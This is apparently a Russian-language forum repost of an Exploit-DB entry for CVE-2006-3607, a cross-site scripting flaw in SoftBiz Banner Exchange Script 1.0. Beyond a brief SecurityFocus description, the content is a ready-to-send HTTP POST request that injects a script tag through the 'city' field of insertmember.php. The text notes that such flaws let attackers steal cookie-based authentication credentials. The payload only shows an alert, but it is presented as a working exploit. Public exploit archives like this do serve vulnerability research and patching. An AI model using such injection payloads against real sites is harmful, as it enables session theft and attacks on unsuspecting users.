Exploit SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
28137
Проверка EDB
  1. Пройдено
Автор
SECURITYCONNECTION
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3607
Дата публикации
2006-06-29
Код:
source: https://www.securityfocus.com/bid/18735/info

Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application.

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

POST http://www.example.com:80/insertmember.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 152
uname=1&add=1&city="><script>alert(/Ellipsis+Security+Test/)</script>&state=1&country=0&url=http%3A%2F%2F&email=1&pwd=1&pwd2=1&submit=Signup
 
Источник
www.exploit-db.com

Похожие темы